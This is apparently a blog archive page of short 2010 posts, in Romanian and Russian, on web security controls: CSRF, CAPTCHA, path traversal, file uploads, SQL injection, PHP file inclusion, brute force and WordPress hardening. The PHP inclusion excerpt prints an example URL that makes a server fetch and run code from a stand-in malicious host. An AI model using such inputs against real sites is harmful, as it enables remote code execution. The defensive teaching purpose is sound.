Archive for category Măsuri de control
Cross Site Request Forgery (CSRF): Descriere, exemple şi măsuri de control.
Posted by Mihai in Măsuri de control, Vulnerabilităţi on May 3, 2010
Vulnerabilitatea Cross-Site Request Forgery (CSRF) [se pronunţă Sea-Surf] se caracterizează prin faptul că aplicaţia web nu poate efectua verificări suficiente, pentru a determina dacă cererea primită de aplicaţie este consistentă, formată corect şi dacă a fost efectuată într-adevăr de către utilizatorul care a efectuat cererea şi nu de către altcineva.
Dacă un server/o aplicaţie web este concepută pentru a primi o cerere din partea unui client, fără nici un mecanism de verificare a autencităţii cererii (dacă aceasta a fost trimisă în mod intenţionat), atunci ar putea fi posibil ca un atacator să forţeze browserul unui client să efectuieze o cerere neintenţionată către serverul web, care va fi tratată ca o cerere autentică. Exploatarea acestei vulnerabilităţi poate fi efectuată prin intermediul unui URL, a unei imagini, a unei cereri XMLHttpRequest, etc. şi poate avea drept consecinţă divulgarea de date sau executarea de cod neintenţionat.
Exploatarea vulnerabilităţii Cross-Site Request Forgery(CSRF) este un alt tip de atac. În loc să exploateze încrederea pe care o are un utilizator într-o aplicaţie web, atacurile CSRF exploatează încrederea pe care o are un site în utilizatorii săi.
Read the rest of this entry »
Уязвимости и простота распознавания CAPTCHA на примерах
Posted by Grigori in Măsuri de control, Securitate Web, Vulnerabilităţi on April 19, 2010
CAPTCHA (от англ. «Completely Automated Public Turing test to tell Computers and Humans Apart» — полностью автоматизированный публичный тест Тьюринга для разделения компьютеров и людей) — тест, целью которого является определение того, кем является пользователь: человеком или ботом. Идея теста в том, что существуют задачи, элементарные для человека, но сложные для компьютера. Чаще всего данный тест используется для предотвращения регистрации ботов на сайтах, для предотвращения разного рода флуда или попыток подбора пароля.
Теперь давайте поговорим о том, как сделать разгадывание капчи как можно более просты для человека и как можно более сложным для компьютера.
Path Traversal: Descriere, exemple, riscuri implicate şi măsuri de control
Posted by Mihai in Măsuri de control, Vulnerabilităţi on April 15, 2010
Path Traversal – Limitarea insuficientă a căii fişierelor/directoriilor în sistemul de fişiere de un directoriu cu acces interzis.
Path Traversal se manifestă ca o vulnerabilitate a unei aplicaţii care utilizează datele de intrare ca parte componentă a căii destinate pentru identificarea unui fişier sau directoriu, şi accesarea directoriului părinte al căruia este interzisă, insă metodele de validare a datelor de intrare nu sunt corecte sau lipsesc. Astfel prin intermediul acestei vulnerabilităţi se poate obţine acces la conţinutul fişierelor şi directoriilor restricţionate iniţial,care se afla în afara directoriului predefinit.
Read the rest of this entry »
Încărcarea fişierelor – Riscuri implicate şi măsuri de control
Posted by Mihai in Măsuri de control, Securitate Web, Vulnerabilităţi on April 8, 2010
Dificultăţile care ar putea apărea în procesul de încărcare a fişierelor (file upload) trebuie identificate în timp util, şi identificarea riscurilor trebuie să aibă loc în procesul de planificare al proiectului. În unele cazuri dificultăţile pot fi evitate prin modificarea cerinţelor proiectului. Unele din întrebările critice la care trebuie ştiut răspunsul de la bun început sunt:
1. Cine va avea permisiunea de a încărca fişiere? Doar utilizatorii autentificaţi sau orice utilizator al sistemului? Read the rest of this entry »
Metode de contraatac la atacurile asupra aplicaţiilor web
Posted by Mihai in Măsuri de control, Securitate Web on April 1, 2010
Conform politicilor şi regulamentelor interne, atunci cînd aplicaţia web este atacată, singurul lucru care îl putem face este să menţinem poziţia de apărare şi să primim loviturile cu decenţă. Este ilegal sau împotriva politicii organizaţionale de a contraataca – aceasta e treaba poliţiei. Cu toate acestea, eficacitatea de aplicare a legii este marginală şi atacatorii acţionează fără constrîngeri. Ei nu au nici un motiv de a opri atacul asupra sistemelor noastre şi nu e nimic ce am putea face decît să încercăm să îi blocăm. Cu toate acestea, există o modalitate de a contraataca într-un mod care nu implică vreun risc legal şi răspundere civilă. Militarii spun că, dacă un duşman nu poate fi distrus, el trebuie orbit; dacă nu poate fi orbit, el trebuie indus în eroare.
Read the rest of this entry »
Методы предотвращения атак SQL Injection
Posted by Grigori in Măsuri de control, Securitate Web, Vulnerabilităţi on March 30, 2010
Для начала давайте попробуем разобраться, что же такое SQL Injection, какие они бывают, чем они опасны и зачем могут применяться. Read the rest of this entry »
Includerea fişierelor PHP, descriere şi măsuri de control
Posted by Mihai in Măsuri de control, Securitate Web, Vulnerabilităţi on March 29, 2010
Ce presupune “Includerea fişierelor PHP” (PHP File Inclusion)? E o greşeală care exploatează utilizarea neintenţionată a unei particularităţi periculoase specifice PHP. Un limbaj de programare complet, ca PHP, de obicei oferă facilitatea de a include fişiere suplimentare spre execuţie. Această caracteristică este utilizată frecvent pentru a include biblioteci, anteturi sau alte elemente de cod comune pentru mai multe pagini sau script-uri. PHP are implementată o particularitate suplimentară a acestei funcţionalităţi: Fişierul sau directoriul inclus nu e obligatoriu să fie unul local. Cu alte cuvinte, dacă un răufăcător reuşeşte să modifice numele fişierului indicat spre a fi inclus în unul de tip
http://exemple.com/?fisier=http://exemple-maliţioase.com/cod.php
atunci output-ul acestui URL va fi inclus şi executat în contextul scriptului local. Read the rest of this entry »
Măsuri de protecţie împotriva atacurilor brute-force
Posted by Mihai in Măsuri de control, Securitate Web on March 24, 2010
Un atac de tip brute-force este un atac în care toate opţiunile posibile sunt verificate, fără a acorda o valoare specială opţiunilor mult mai probabile, formal mai este cunoscut sub numele de atac de enumerare (enumeration attack) – atacul prin care se enumeră toate posibilităţile.
În ceea ce priveşte controlul accesului, atacurile de tip brute-force implică de obicei un singur atacator care încearcă să se logheze cu un număr foarte mare de tentative. În majoritatea cazurilor, numele de utilizator utilizate sunt cunoscute, iar parola este ghicită.
Deşi nu este un punct de vedere tehnic, un atac brute-force este foarte asemănător cu un atac după dicţionar. Cea mai mare diferenţă este că un atac după dicţionar enumeră parolele după o listă de posibilităţi probabile, iar brute-force prin intermediul enumerârii unei liste a tuturor posibilităţilor. Read the rest of this entry »
Securizare WordPress
Posted by Mihai in Măsuri de control, Securitate Web on March 22, 2010
Astazi am fost martorul unei compromiteri a unui site bazat pe popularul sistem de blogging WordPress. Situl bologan.com a fost compromis. Continutul a 2 fisiere a fost modificat si incluse linii de cod javascript care incercau sa infecteze utilizatorii sitului cu programe malware. Aceasta a avut loc din cauza că versiunea aplicaţiei utilizate nu era actuală. Din cauza popularităţii foarte mari, fiecare breşă de securitate a WordPress e utilizată pe larg în infectarea utilizatorilor cu aplicaţii malware şi crearea botnet-urilor. Read the rest of this entry »